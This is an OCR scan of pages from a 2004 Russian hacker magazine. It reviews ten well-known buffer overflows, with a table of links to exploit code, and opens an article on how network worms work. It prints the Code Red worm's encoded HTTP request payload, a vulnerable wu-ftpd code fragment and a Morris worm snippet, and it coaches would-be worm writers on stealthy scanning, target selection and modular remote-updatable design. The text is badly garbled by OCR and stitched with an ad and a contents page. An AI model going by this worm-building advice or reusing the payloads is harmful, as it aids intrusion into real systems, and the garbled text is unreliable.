место в компьютерной истории и пот- RPC-DCOM эксплоитом и ощутил, что EVID, можно присоединить собствен- 
рясли весь мир. значит не угадать адрес возврата: ный процесс к уже существующему. 
Существует удаленная система сразу же уходила При этом в стек загрузится shell-Kog, 
я > в даун. Когда таргет был верным, ты искусный бэкдор или другие Bpeg- 
эксплоитов ©. RPC-DCOM overflow получал командный shell. ные вещи. 
РА Лето прошлого года ознаменова- —_ Спустя год, когда о баге уже забыли, 
op лось мрачным известием: все МТ-сис- SS SS = = | како страшном сне, появилась еще 
pile eae темы от Microsoft оказались уязвимы- be ee кн одна напасть. Kak всегда, программис- 


ты неэффективно пофиксили брешь. 
В итоге, если наплодить несколько 
процессов, к одному из них можно 
присоединить "левый" процесс. С вы- 
текающими последствиями и команд- 
ным Shell'om. 


Вывод: Linux не такой уж и защи- 
щенный, как кажется на первый 
взгляд, порой от кернеловых уязви- 
мостей охота застрелиться :). Так что, 
если желаешь абсолютной безопас- 
ности, ставь патчи от ptrace(). 


9. ASN.1 heap overflow 

Данный баг появился не так давно. 
Бдительно проанализировав работу 
защищенной библиотеки MSASNI1.DLL, 
входящей в секурный комплект ASN 


(Abstract Syntax Notation One), компа- 
ния eEyes обнаружила шокирующую 
брешь. Ошибка в процессе ASN.1 ge- 
кодирования позволяла хакеру пере- 
записать участок памяти и выполнить 
некоторый код. Если всмотреться в 
особенности работы библиотеки, то 
можно понять принцип бага: в прото- 
Kone существует некоторая функция, 
выделяющая блок памяти под дан- 
ные. Ей передается необходимая дли- 
на этого блока. При этом юзер не мо- 
жет задать длину от фонаря: есть 
функции, проверяющие достовер- 
ность данных. eEyes нашла способ 
подставить такое значение парамет- 
ра, при котором указатель на память 
"проедет" допустимое 32-битное ag- 
ресное поле и занимает нулевую по- 
зицию (интервал длины от 
OxFFFFFFFD go OXFFFFFFFF). В против- 
ном случае мы получим простое цело- 
численное переполнение, результа- 
том которого будет аварийное завер- 
шение атакуемой службы (именно по 
такому принципу работали Во5'еры 
для ASN.1). Если же все-таки посту- 
пить хитрым образом и сместить по- 
интер до нуля, можно вставить опре- 
деленный код на определенную пози- 
цию памяти (которую атакующий, ес- 
тественно, будет знать). В итоге, shell- 
код успешно выполнится, а служба 
будет функционировать в обычном 
режиме. Если тебя интерсуют подроб- 
ности, топай на 
http://www.securitylab.ru/42702.html. 
Уязвимость в ASN.1 признана $еси- 
ritylab'om самым хитовым багом в 
Windows из-за того, что протокол ис- 
пользуется не только в самих фор- 
точках, но и в приложениях Mozilla, 
Internet Explorer и в сосфте для [Р-те- 
necpouun. Кстати, все новые эксплои- 
ты для службы Isass.dll (а также про- 


РЕЗЮМЕ 


цесс размножения червя Saccer) ос- 
нованы на бреши в ASN.1. 
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Ошибка в Isass.d/l базируется Ha баге в 
ASN.1 


©. do_brk() kernel overflow 
Опять Linux и опять кернел. В конце 
ноября прошлого года обнаружилась 
брешь в ядре, через которую был 
произведен взлом нескольких круп- 
ных Debian-cepBepos. Как оказалось, 
параметры ядерной срункции do_brk() 
не проверялись на размер. Это влек- 
ло за собой переполнение буфера. 
Технически это выглядит следующим 
образом: do_brk() работал напрямую с 
памятью, однако размер памяти, кото- 
рый может использовать обычный 
пользователь, контролировался, мяг- 
ко говоря, не очень хорошо. В итоге, 
миновав участок пользовательского 
пространства, злоумышленник мог пе- 
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Используем брешь в do_brk() 


Ш Подведем итоги этого обзора. Всмотрись в таблицу и увидишь 
все документированные источники и ссылки на эксплоиты. Вдоба- 
вок я оценил рассмотренные уязвимости по 10-балльной шкале. 


Уязвимость BugTraq 


Эксплоит Оценка 


RPC-DCOM 


http://www.security.nnov.ru/sea 
rch/document.asp?docid=4899 


http://www.security.nnov.ru 
/files/w2krpcdos.c 


ptrace() 


http://www.security.nnov.ru/sea 
rch/document.asp?docid=2106 


http://kamensk.net.ru/forb/ 
isec.c 


ASN.1 


http://www.securitylab.ru/427 
02.html 


http://kamensk.net.ru/forb/1 
/x/Isasrv.c 


do_brk() 


http://security.nnov.ru/search 
/document.asp?docid=5475 


http://www1.xakep.ru/post/ 
20623/dobrk.txt 


mIRC 


http://www.irchelp.org/irchelp 
/mirc/exploit.htm| 


http://kamensk.net.ru/forb/1 
/x/mirc-dos.tar.gz 


Half-Life 


http://www.securitylab.ru/?ID 
=40144 


http://www.security.nnov.ru 
/files/pu-hl.c 


Internet Explorer 


http://www.securitylab.ru/428 
43.html 


http://www.securitylab.ru/4 
2844.html 


Shoutcast 


http://security.nnov.ru/search 
/document.asp?docid=5346 


http://www1.xakep.ru/post/1 
4351/shoutdown.01.tar 


SERV-U 


http://www.securitylab.ru/447 
16.html 


http://www.securitylab.ru/4 
4716.html 


Wu-Ftpd 


http://securitylab.ru/40948.html 


http://securitylab.ru/40948 
Atm! 


резаписать зону памяти стороннего 
привилегированного процесса до ку- 
чи, выполнив собственный $Не!-код. 
Эта функция служила лишь нача- 

лом всех бед. После do_brk() появи- 
лись тгетар() и munmap(), которые 
базируются на общем ттаро-вызо- 
ве. В конце концов, баг запатчили, но 
далеко не все админы применяют вы- 
пущенные багориксы. 


©. mIRC buffer overflow 

С ядрами систем разобрались. 
Пришло время ознакомиться с багами 
в популярном cocpTe. Самым безопас- 
ным !РС-клиентом всегда считался 
mIRC. В нем практически никогда не 
находили серьезных ошибок. 1 октяб- 
ря 2003 года любопытные хакеры об- 
наружили переполнение буфера в 
процедуре DCC-nepegaun. Дело в том, 
что имя файла не контролируется на 
размер - типичный недочет, ведущий 
к переполнению буфера. В итоге, ес- 
ли хакер подставит в качестве имени 
большую последовательность вида 
"X X X X X...", заканчивающуюся симво- 
лом с А5С!-кодом 1, клиент сразу же 
отбросит копыта. В свежих релизах 
баг якобы посфиксили, но окончатель- 
ный фикс объявили только с выходом 
последней версией клиента (6.14). 
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Эксплоит для убийства клиентов 


9. Half-Life buffer overflow 

Следующим хитовым багом явля- 
ется брешь в протоколе обмена 
Half-Life. Как ты знаешь, в провай- 
дерских сетях часто встречаются та- 
кие сервера. Переполнению подвер- 
жены как клиенты, так и машины на 
базе FreeBSD. Если прикинуться 
своим НЁ-серваком, старательно 
разрекламировать его в ламерских 
чатах, а затем запустить специаль- 
ный эксплоит, у клиента Халора сор- 
вет крышу :). С помощью кривых па- 
кетов сервер переполняет буфер у 
машины ламера и запускает команд- 
ный shell. 
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Локальный рут через Half-Life 
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Недавняя 
уязвимость 
в виндовом 
SSL обус- 
ловлена 
тем, что 
протокол 
использует 
бажные 
функции 
библиотеки 
ASN.1. 


Если xo- 
чешь обезо- 
пасить себя 
от 
mIRC'oBon 
ошибки, HO 
лень делать 
апдейт, вы- 
полни ко- 
манду 
Jignore -wd *. 
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Ocen IE cna- 
вится свои- 
ми перепол- 
нениями. 
Полный их 
список ты 
можешь 
найти на 
securitylab.ru. 


Если ты все 
еще юза- 
ешь бажный 
SERV-U, 
немедленно 
отправляй- 
ся на 
www.serv- 
u.com и об- 
новляй де- 
мон. 


т 


ЕСЯТКА САМЫХ-САМЫХ ) 


Если использовать эксплоит для 
FreeBSD Н!-сервера, то мы получим 
рутовый /bin/sh. Сплоит скомпромети- 
рует сервер к переполнению, пуляясь 
в него кривыми УОР-пакетами. Этакий 
забавный серверный Half-Life ;). 


О. Buffer overflows т Internet 
Explorer 

Наконец мы добрались go нашего 
любимого ослика ;). В нем тоже были 
найдены грешки программистов 
Microsoft. В осле обнаружили не одну, 
а даже несколько смертельных багов. 

Первой уязвимостью является пере- 
полнение, ведущее к перезаписи спе- 
циальных регистров и последующей 
порче виндового реестра. Как ты зна- 
ешь, в IE применима конструкция ви- 
да file://c:\filename. При этом никто не 
мешает подставить вместо с: шестнад- 
цатеричное значение (например, xff). 
Это нововведение приведет к инте- 
ресной ситуации: перезапишутся три 
регистра ECX EDX u EDI. Когда это слу- 
чится, системные записи в реестре по- 
летят к чертовой матери :). После это- 
го IE наотрез откажется отображать 
любую запрошенную страницу (отмаз 
будет выглядеть следующим образом: 
"You cant access this file, path, drive. 
Permission Denied"). Только переуста- 
новка IE избавит юзера от такого Ha- 
зойливого окна. 

Как выяснилось, ослика также тош- 
нит от греческих символов :). Если 
сделать интересный запрос вида 
абоиболее_2_тысяч_греческих_сим- 
волов, вылезет окно с инфой о пере- 
полнении. То же окошко можно поя- 
вится, если подставить символы в 
http-ccbinky. Ничто не мешает хакеру 
смастерить страничку, которая будет 
убивать IE у нерадивых посетителей. 
Брешь может проявиться и в мирное 
время, когда пользователь серфит 
какой-нибудь буржуйский инет-мага- 
зин (именно об этом гласил первоис- 
точник уязвимости). 

И, наконец, самый свежий баг, кото- 
рый обнаружился после анализа 
честно спионеренных исходников 
Windows. С помощью Internet Explorer 
можно выполнить произвольный код, 
переполнив буфер. Брешь достаточ- 
но простая: злоумышленник должен 
сконструировать специально обрабо- 
танный bitmap-qpamn. Когда такой 
файл будет загружен в браузер ушас- 
того ламера, возникнет переполнение 
буфера. Изъян нашли в коде 
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Множество переполнений в браузере 
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ЗА РАМКАМИ ОБЗОРА 


Ш Не думай, что хакеры откопали только десять переполнений. На 
самом деле их тысячи, но я выбрал лишь самые хитовые и, по боль- 


шей части, актуальные до сих пор. Действительно, найти в инете 
жертву, подверженную одной из десятки уязвимостей, - как два 
байта переслать. Но не вздумай убеждаться в этом - старший брат 
следит за тобой ;). 


С помощью Internet Explorer можно 
выполнить произвольный код, 
переполнив буфер. 


'win2k/private/inet/mshtml/src/site/do 
wnload/imgbmp.cxx'. 


О. Shoutcast heap overflow 

Еще одна хитрая уязвимость наш- 
лась в проекте Shoutcast. Все нача- 
лось с того, что хакер с ником НЕХ за- 
метил возможность переполнения 
значений переменных icy-name и icy- 
desc (имя и описание сервиса), пере- 
дающихся через Web. Их размер, как 
обычно, не контролировался. Через 
несколько дней после этого компания 
mOO-security наколбасила виндовый 
эксплоит. Причем сырцы этого сплои- 
та хранились в строжайшей тайне, gO 
тех пор пока хакер не выложил эгс- 
код, приводящий к краху линуксовый 
Shoutcast. 


Дыра в сервере Shoutcast 


Единственным спасением является 
то, что без знания пароля, задаваемо- 
го при конфигурации сервера, хакер 
не сможет переполнить буфер. OgHa- 
ко дефолтовый пассворд выглядит 
как "спапдете" и, как ни странно, 
юзается многими админами. Если вер- 
сия демона - старше 1.9.2, перепол- 
нить буфер уже не удастся. 


©. Serv-U buffer overflows 
Теперь поговорим об ЕТР-серверах. 
Виндовый Serv-U, славившийся ста- 
бильностью, изрядно подпортил себе 
репутацию. Багоискатели нашли це- 
лых три уязвимости, которые приво- 
дят либо к краху сервера, либо к по- 
лучению абсолютных прав на маши- 
не. Рассмотрим эти бреши подробнее. 
Первая дырка затаилась в команде 
CHMOD, изменяющей права на фай- 
лы. Ее параметр ограничен лишь 256 
байтами, но это ограничение никто не 
проверяет. А, как известно, что не 


запрещено, то разрешено. Вот и стали 
подставлять хакеры вместо реально- 
го файла всякую фигню. В итоге, бу- 
сфер переполнялся, а shell-kog, грамот- 
но переданный серверу, выполнялся 
на ура. По понятным причинам злоу- 
мышленник получал командный shell 
на левом порту. Если по каким-то при- 
чинам адрес возврата был подобран 
неверно, взломщик просто останавли- 
вал работу Serv-U. 
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Симпатичная мордочка Serv-U 


—— пен сии: 


Не успели девелоперы пофиксить 
этот баг, как хакеры нашли еще один. 
На этот раз неверная обработка ко- 
манды LIST -1 с подставным парамет- 
ром в 134 байта убивала Serv-U. Убий- 
ство сервака можно было осущест- 
вить даже без эксплоита, вручную. 
Однако к описанию приводился пол- 
ноценный перловый сплоит. 

Вскоре багоискатели откопали тре- 
тий изьян - в функции МОТМ. Эта ко- 
манда отображает время создания 
файла. Ошибка заключается в том, 
что размер этого срайла не может пре- 
вышать 256 байт. Когда хакер переда- 
ет слишком длинный аргумент, проис- 
ходит переполнение буфера. Послед- 
ствий может быть два: либо осущест- 
вится корректная передача $Пе!-кода 
(с последующим открытием порта), 
применимого для определенной ОС, 
либо сервис просто уйдет в даун. 

Из всего этого можно сделать один 
вывод: хакеры всерьез занялись изу- 
чением Serv-U. И в новых релизах бу- 
дут найдены подобные ошибки. 


©. Wu-ftpd buffer overflow 

И, наконец, пришло время для само- 
го бажного проекта - wu-ftpd 
(сфтпд'шник, который писался в Ваши- 
нгтонском университете). Каждый 
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просвещенный человек знает, что не существует релиза, в 
котором хакеры не нашли бы ошибок :). Впрочем, предпос- 
ледняя версия сервера продержалась без атак довольно 
продолжительное время. Но, опять же, багоискатели обна- 
ружили брешь в $КЕУ-обмене, приводящую к переполне- 
нию буфера и получению абсолютных прав. Переполнение 
найдено в функции skey_challenge(). Привожу кусок кода 
src/skey_challenge.c: 


if (pwd == NULL || skeychallenge(&skey, pwd->pw_name, sbuf)) 
sprintf(buf, "Password required for %s.", name); 
else 
sprintf(buf, "%s %s for %s.", sbuf, pwok ? "allowed" : "required", 
name); 
/* переменная Name не проверяется Ha размер */ 
eturn (buf); 
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Даже я смог узреть возможность переполнения. Куда 
смотрят вашингтонские программисты - одному Богу изве- 
CTHO. 


ЭТО КОНЕЦ? 

и К сожалению, абсолютной защиты от переполнений не 
существует. Возможно, что в самых стабильных и защи- 
щенных протоколах ждет своего часа смертельная уязви- 
мость. Каждый день какой-нибудь хакер находит перепол- 
нение буфера или стека. Радует, что COCpT, в котором нахо- 
дится брешь, не очень популярен. Однако из этого обзора 
видно, что иногда Overflow встречается в крупных и очень 
популярных приложениях. МЕ 


POST сдостадвкой нА дом 


www.gamepost.ru 


www.e-shop.ru 


Мы научим тебя 


JHOHOMATD! 


PSZ +4 меры =( 


Peas 


Camel ube + 4 меры = 
CBA 517 +3 v2per = 


Ten.(095): 928-0360, 928-6089, 928-3574 
пн.-пт. с 09:00 до 21:00 (сб.-вс. с 10:00 до 19:00) 


6 Я ХОЧУ ПОЛУЧАТЬ 


А БЕСПЛАТНЫЙ КАТАЛОГ 
a POST 


ie ИИ 


УЛИЦА row | ee ar 


ФИО 
ОТПРАВЬТЕ КУПОН ПО АДРЕСУ: 101000, МОСКВА, ГЛАВПОЧТАМТ, А/Я 652, Е-ЗНОР 


Content: 


44 Вскрытие червяка 
сследование работы сетевых 
червей 


48 SEH на службе у 
контрреволюции 


обработчика 


ереполнения при обработке 
данных 


56 Unicode-Buffer 
Overflows 


кодов 


Власть! 


Windows и *nix 


64 Живучий код 


shell-koga 


68 Защитись и замети! 
Защита от эксплоитов и 
закрытие уязвимостей 

после атаки 


Руководство по перезаписи SEH- 


52 Отравляем приложения 


Проблемы эксплуатации срормата 
Unicode и написание Unicode shell- 


60 Платформа. Overflow. 


Переполнение Gycpepa в системах 


Техника написания переносимого 


РЕАЛИЗАЦИЯ 


Крис Касперски аКа мыщьх 


ВСКРЫТИЕ ЧЕРВЯ KA ) 


ВСКРЫТИЕ 
ЧЕРВЯКА 


ИССЛЕДОВАНИЕ РАБОТЫ СЕТЕВЫХ ЧЕРВЕЙ 


ошибок переполнения! 


ы живем в неспокойное время. Интернет содрогается под ударами червей, 
активность которых стремительно растет. Пять опустошительных 
эпидемий за последние три года, миллионы зараженных машин. И все из-за 


4 


УТРАЧЕННОЕ ЗВЕНО 

Черви относятся к наибо- 
лее независимым обитателям 
кибернетического мира. Их по- 
явление уходит своими корня- 
ми в глубокую древность, когда землей пра- 
вили динозавры - огромные и неповоротли- 
вые ламповые ЭВМ, издающие при работе 
ужасный треск и скрежет. Пионеры компью- 
терной индустрии - в прошлом небритые сту- 
дены с неутолимой жаждой деятельности, а 
ныне сотрудники респектабельных корпора- 
ций - активно экспериментировали с биоки- 
бернетическими моделями, пророча им боль- 
шое будущее. Во время становления инорор- 
матики как науки Настоящие Программисты 
(Real Programmer), неутомимые энтузиасты, 
свято верили, что еще чуть-чуть и грохочу- 
щее создание приобретет интеллект, а вмес- 
те с ними - навыки самосовершенствования 
и саморазмножения. В то время понятия "ви- 
рус" еще не существовало, и никто не видел 
в биокибернетических механизмах ничего 
порочного. О них говорили в курилках, их об- 
суждали на научном уровне, им выделялось 
драгоценное машинное время. 

С приходом к власти корпораций все изме- 
нилось. Информатика из науки превратилась 
в продажную девку капитализма, торгующую 
собой и не интересующуюся ничем, кроме 
прибыли. Программное обеспечение расколо- 
лось на правильное и неправильное. Пра- 
вильное - то, которым можно торговать. Не- 
правильное - написанное не ради денег, не с 


Кого что поражал 


обнаружен 


целью получения научных грантов и даже не 
под эгидой агрессивной идеологии Ореп 
Source, а для собственного удовольствия и 
удовлетворения программистского зуда, кото- 
рый сжигает вас изнутри, гонит вперед, Nog- 
брасывает по ночам из постели, подкидывая 
новые идеи, которые тут же необходимо оп- 
робовать. Вот это - настоящее! Это не элект- 
ронная таблица, не база данных, созданная 
для простых клерков. В каждой сточке кода - 
частичка вас самих, придающая смысл всему 
происходящему. Это то звено, которое отли- 
чает ремесло от конвейера, но оно, к сожале- 
нию, сейчас оказалось практически утрачено. 
Электронно-вычислительные машины перес- 
тали вызывать благоговение, превратившись 
в "компы", и мистическое чувство единения с 
ними рассыпалось, исчезло. 


ЯВЛЕНИЕ ЧЕРВЯ 

Червями называют разновидность виру- 
COB, размножающуюся без участия челове- 
ка. Если файловый вирус активизируется 
лишь при запуске зараженного срайла, то се- 
тевой червь проникает в твою машину са- 
мостоятельно - достаточно лишь просто вой- 
ти в интернет. По сути, черви являются высо- 
коавтономными роботами, брошенными в пу- 
чину всемирной сети и вынужденными бо- 
роться за выживание. Червей можно срав- 
нить с космическими зондами, конструктор 
которых должен предусмотреть все до мело- 
чей, ведь потом исправить ошибку уже не 
удастся. Кстати, ошибки проектирования 


машин 


механизмы распространения заразил 


Вирус отладочный люк в Sendmail, переполнение 
Морриса 1988, ноябрь | UNIX, VAX буфера в finger, слабые пароли 6.000 
Melissa 1999, 222 ta pa человеческий срактор 1200.000 
LoveLetter 2000, май e-mail через VBS человеческий фактор 3.000.000 
Klez 2002, июнь e-mail через баг в IE | уязвимость в IE с IFRAME 1.000.000 
: = - переполнение буфера в Sun Solaris 
sadmind/IIS 2001, man Sun Solaris/IIS ее 8.000 
Code Red ИИ | 2001, июль 155 переполнение буфера в IIS 1.000.000 
Nimda 2001, сентябрь | ISS переполнение бусрера в IIS, слабые пароли и gp.) 2.200.000 
Заррег 2002, июль Lunix Apache переполнение буфера в OpenSSL 20.000 
Slammer 2003, январь | MS SQL переполнение буфера в SQL 300.000 
Love San 2003, август МТ/200/ХР/2003 переполнение буфера в DCOM м 
ков - от червя Морриса до червей наших дней и 
ХАКЕРСПЕЦ | 08(45) | 2004 


червей обходятся намного дороже 
ошибок проектирования космических 
станций. Вы только представьте, ка- 
кая Ha могт-мейкерах лежит ответ- 
ственность! Поэтому пионерам червей 
лучше не писать. Лучше им учить мат. 
часть, ассемблер и ТСРЛР-протоколы 
и забыть о деструкции! Деструктив- 
ный код - это плохой код. На ванда- 
лизм много ума не надо, а вот ухит- 
риться проникнуть в миллион удален- 
ных узлов, при этом ни один из них не 
уронив, - это цель, достойная истинно- 
го хакера! 


КОНСТРУКТИВНЫЕ 
ОСОБЕННОСТИ ЧЕРВЯ 

m С анатомической точки зрения 
червь представляет собой морфоло- 
гически неоднородный механизм, в ко- 
тором можно выделить, по меньшей 
мере, три основных компонента: ком- 
пактную голову и протяжный хвост с 
ядовитым жалом. Разумеется, это 
только схема, и черви совсем не обя- 
заны полностью ей соответствовать. 

Необходимость дробления монолит- 
ной структуры червя на голову и 
хвост вызвана ограниченным разме- 
ром переполняющихся буферов, ко- 
торый в подавляющем большинстве 
случаев не превышает пары десятков 


ГОЛОВА ЧЕРВЯ СОБЕ 
RED, ПРИХОДЯЩАЯ В 
ПЕРВОМ ТСР-ПАКЕТЕ 
ЗАПРОСА 


GET /default. ida? 
XXXXXXXXXXXXXXXXXXXXAXXXAKAXAXXNX 
19,0,0,0,0,0,0,0,0,0,0.0.0,0,0,0,0,0,0,0,0,0,0,0,0,0.0.0,0,0010. 
%u9090%u6858%ucbd3%u7801%u9090 
%и6858%ис693%и7801%и9090%и6858 
%ис093%и7801%и9090%и9090%и8190 
%и00с3%и0003 Жи8Б00%и5316%и5ЗН 
%и0078%и0000%и00= a HTTP 1.0 
Content- type: text/ xml, 

Content- length: 3379 


Голова у червя может быть не одна. 
Тогда он может поражать несколько 
типов серверов (например, сервера 
MS SQL, MS IIS и SendMail), значитель- 
но расширяя ареал своего обитания. У 
червя Морриса было две головы - Og- 
на поражала finger, другая - sendmail, 
а MWORM'a - целых пять, что позволя- 
ло ему распространятся через web-, 
ftp-cepBepa и дыры в демонах rpc, bind 
и [ра. Love San, Slapper и Slammer име- 
ли по одной голове, что совсем не по- 
мешало занять им первые места в 


Ошибки проектирования червей 
обходятся намного дороже ошибок 
проектирования космических станций. 


байт. Только самым крохотным и при- 
митивным червям удается втиснуться 
в этот объем целиком, в остальных же 
случаях сначала на атакуемую маши- 
ну забрасывается загрузчик, устанав- 
ливающий ТСР/УР-соединение и под- 
тягивающий оставшийся хвост, иначе 
называемый основным телом червя. 

Голова червя отвечает за перепол- 
нение буфера, захват управления 
удаленной машиной, установку 
ТСРЛР-соединения и транспортировку 
хвоста. Образно говоря, голова - это 
ниназя, десантирующийся в укреп- 
ленный район вражеского подразде- 
ления, бесшумно делающий охране 
харакири, отпирающий ворота и за- 
жигающий посадочный маяк, обеспе- 
чивающий приземление основной 
группы. Как минимум, голова червя 
включает в себя запрос, посылаемый 
серверу, срывающий крышу одному 
из его буферов и передающий управ- 
ление либо на $Не!-код, либо на сек- 
ретную функцию root, которая обес- 
печивает удаленный доступ к серве- 
ру. Голова червя чаще всего пишется 
на голом ассемблере, а в наиболее от- 
ветственных случаях - непосредствен- 
но в машинном коде (трансляторы ас- 
семблера He переваривают многих 
эффективных трюков). 


КУСОК ХВОСТА ЧЕРВЯ 
МОРРИСА 


rt_init()/* 0x2a26 */ 


{ 

FILE *pipe; 

char input_buf[64]; 
int 1204, 1304; 


ngateways = 0; 
pipe = popen(XS("/usr/ucb/netstat -r - 
п"), XS("r")); 
/* &envl02,&env 125 */ 
if (pipe == 0) return 0; 
while (fgets(input_buf, sizeof(input_buf), 
pipe)) 
{ /* to 518 */ 
other_sleep(0); 
if (ngateways >= 500) break; 
sscanf(input_buf, XS("%s%s"), 1204, 
1304);/* <env+127>"%s%s" */ 
/* other stuff, I'll come back to this 
later */ 
}/* 518, back to 76 */ 
pclose(pipe); 
rt_init_plus_544(); 
return 1; 
}/* 540 */ 


ции будет расти в геометрической 
прогрессии. Ввиду высокой алгоритми- 
ческой сложности и отсутствия огра- 
ничений на предельно допустимый 
размер, хвост червя чаще всего разра- 
батывается на языках высокого уров- 
ня, например, на языке Си, хотя Форт 
или Алгол подошли бы ничуть не ху- 
же, но это уже дело вкуса, о котором 
не спорят (но Си все равно лучше). 


Настоящий червь должен 
вести кочевую жизнь, 
блуждая от машины к машине. 


Topl0. Как видно, количество голов са- 
мо по себе еще ни о чем не говорит, и 
одна умная голова лучше трех глупых. 
Хвост червя решает более общие за- 
дачи. Оказавшись на территории ве- 
роятного противника, спецназ должен 
первым делом окопаться. Некоторые 
черви зарываются в исполняемые 
срайлы, прописывая путь к ним в клю- 
че автоматического запуска, некото- 
рые довольствуются одной лишь опе- 
ративной памятью, погибая после вык- 
лючения питания или перезагрузки. И 
это правильно! Настоящий червь дол- 
жен вести кочевую жизнь, блуждая от 
машины к машине, - в этом и есть его 
предназначение. Как говорится, мавр 
сделал свое дело и может уходить, а 
червю предстоит сделать не так уж и 
много: найти, по меньшей мере, две 
жертвы, пригодные для внедрения, и 
забросить в них свою голову (точнее, 
копии своих голов). Теперь, даже если 
червь умрет, численность его популя- 


Подавляющее большинство червей 
неядовито, и весь вред от них сводит- 
ся к перегрузке сетевых каналов из- 
за неконтролируемого размножения. 
Лишь у немногих на конце хвоста рас- 
положено ядовитое жало или, в бо- 
лее общем случае, полезная нагрузка 
(читай - боевая начинка). Например, 
червь может устанавливать на атаку- 
емой машине терминальный Shell, пре- 
доставляющий возможность удален- 
ного администрирования. До тех пор 
пока эпидемия такого червя не будет 
остановлена, в руках его создателя 
будут находиться рычаги управления 
нашим миром и он в любой момент 
сможет прервать его бренное сущест- 
вование. Нет, атомные электростан- 
ции взорвать не удастся, но вот по- 
дорвать экономику, уничтожив банко- 
вскую информацию, сможет даже на- 
чинающий хакер. Знающие люди ут- 
верждают, что такая угроза нависала 
уже неоднократно и лишь грубые 


Данная 
статья ни в 


коем случае 
не пропа- 
гандирует 
создание 
червей. 
Помните, в 
России та- 
кого рода 
деятель- 
ность уго- 
ловно нака- 
зуема. 


Голова у 
червя мо- 
жет быть и 
не одна, 
тогда он 
может по- 
ражать нес- 
колько ти- 
пов серве- 
ров, напри- 
мер, MS 
SQL, MS IIS 
и SendMail. 
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ВСКРЫТИЕ ЧЕРВЯКА ) 


Стремительное размножение червей вызывает засорение 


Найти деск- 
риптор 
TCP\IP-coe- 
динения 
можно пе- 
ребором 
всех соке- 
тов через 
функцию 
getpeer- 
name. 


Окопавшись 
в системе, 
червь прис- 
тупает к 
поиску но- 
вых жертв 
и рассылке 
своей голо- 
вы по под- 
ходящим 
адресам. 


ошибки, допущенные при проектиро- 
вании червей, не позволили ей во- 
ПЛОТИТЬСЯ В ЖИЗНЬ. 

Последний писк моды - модульные 
черви, поддерживающие возмож- 
ность удаленного конфигурирования 
и подключения плагинов через интер- 
нет. Только прикиньте, насколько ус- 
ложняется борьба в условиях непре- 
рывно изменяющейся логики поведе- 
ния червя. Администраторы ставят 
фильтры, а червь их успешно преодо- 
левает! Запускают антивирус, а червь 
подхватывает брошенный ему щит и, 
воспользовавшись замешательством 
противника, со всей дури бьет его по 
голове. Правда, и здесь проблем тоже 
хватает. Система распространения 
плагинов должна не только быть пол- 
ностью децентрализованной, но и 
уметь при случае постоять за себя, в 
случае если администраторы подки- 
нут плагин-бомбу, которая разорвет 
червя на куски. В общем, тут есть еще 
над чем подумать и поработать! 


ДОЛГ ПЕРЕД ВИДОМ, ИЛИ 
РОЖДЕННЫЙ, ЧТОБЫ УМЕРЕТЬ 
m Считается, что естественная цель 
всех живых организмов (и червей в 
том числе) - это неограниченная экс- 
пансия, или, попросту говоря, захват 
всех свободных и несвободных терри- 
торий. На самом деле, это неверно. 
Чтобы не NOGOXHYTb от голода, каж- 
дый индивидуум должен находиться в 
гармонии с окружающей средой, nog- 
держивая баланс численности своей 
популяции в равновесии. Нарушение 
этого правила оборачивается неиз- 
менной катастросрой. 

Червь должен бережно относиться 
к ресурсам кибернетического мира - 
оперативной и дисковой памяти, про- 
цессорному времени и пропускной 
способности сетевых каналов, по- 
братски разделяя их с остальными 
обитателями "глубины". Предостав- 
ленные сами себе, черви размножа- 
ются в геометрической прогрессии, и 
численность их популяции взрывооб- 
разно растет. А ведь толщина магист- 
ральных интернет-каналов не безгра- 
нична! Рано или поздно сеть перена- 
сыщается червями и "встает", не 
только препятствуя их дальнейшему 
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размножению, но и поднимая с посте- 
ли матерящихся администраторов, ус- 
танавливающих свежие заплатки и 
перетирающих червей в труху. Пойми- 
те же вы наконец, что администрато- 
ры объявляют войну лишь тем чер- 
вям, которые им сильно досаждают. 
Ведите себе скромнее! Будьте тише 
воды, ниже радаров! 


ТАКТИКА И СТРАТЕГИЯ 

m Основные враги ниндзя - это тем- 
нота, неизвестность, колючая прово- 
лока и волкодавы, снующие по охра- 
няемой территории. 

Подготовка к заброске shell-Koga на- 
чинается с определения |IP-agpecos, 
пригодных для вторжения. Если 
червь находится в сети класса С, три 
старших бита IP-agpeca которой рав- 
ны 110, то ее можно и просканировать 
(распотрошите любой сканер, если не 
знаете как). Сканирование сетей ос- 
тальных классов занимает слишком 
много времени и немедленно привле- 
кает к себе внимание администрато- 
ров, а этим черви предпочитают не 
злоупотреблять. Вместо этого они вы- 
бирают пару-тройку случайных IP-ag- 
ресов, выдерживая каждый раз секу- 
наную паузу, дающую ТСР/Р-пакети- 
кам время рассосаться и предотвра- 
щающую образование "запоров". 
Червь Slammer, поражающий SQL- 
сервера, не делал такой паузы и поэ- 
тому сдох раньше времени, а вот Love 
Зап жив и поныне. Nimda и некоторые 
другие черви не играют в кости и оп- 
ределяют целевые адреса эвристи- 
ческим путем: анализируя содержи- 
мое жесткого диска (перехватывая 
проходящий сквозь них традфик), они 
ищут url'bI, е-та!'ы и прочие полез- 
ные ссылки, занося их в список канди- 
датов на заражение. 

Затем кандидаты проходят предва- 
рительное тестирование. Червь дол- 
жен убедиться, что данный IP-agpec 
действительно существует, удален- 


ный узел не висит и на нем установ- 
лена уязвимая версия сервера или 
операционная система, известная 
червю и совместимая с shell-kKogom og- 
ной или нескольких его голов. 

Первые две задачи решаются предель- 
но просто: червь отправляет серверу ле- 
гальный запрос, на который тот обязан 
ответить (для web-cepBepa это запрос 
СЕТ), и, если сервер что-то промычит в 
ответ, значит жив, курилка! Заметим, что 
отправлять серверу эхо-запрос, более из- 
вестный в народе как ping, неразумно, так 
как его может сожрать недружелюбно 
настроенный брандмауэр. 

С определением версии сервера ge- 
ла обстоят значительно сложнее, и 
универсальными решениями здесь и 
не пахнет. Некоторые протоколы nog- 
держивают специальную команду или 
возвращают версию сервера в строке 
приветствия, но чаще всего информа- 
цию приходится добывать по косвен- 
ным признакам. Различные операци- 
онные системы и сервера по-разному 
реагируют на нестандартные пакеты 
или проявляют себя специфическими 
портами, что позволяет осуществить 
грубую идентификацию жертвы. А 
точность червю нужна, как зайцу пан- 
талоны, а собаке пятая нога, ведь 
главное - отсеять заведомо неподхо- 
дящих кандидатов. Если забросить го- 
лову червя на неподходящий укрепи- 
тельный район, ничего не произойдет. 
Голова, точнее, копия головы погиб- 
нет, только и всего. 

На завершающей стадии разведы- 
вательной операции червь посылает 
удаленному узлу условный знак, нап- 
ример, выпускает две зеленые ракеты 
(отправляет ТСР-пакет с кодовым пос- 
ланием внутри). Если узел уже захва- 
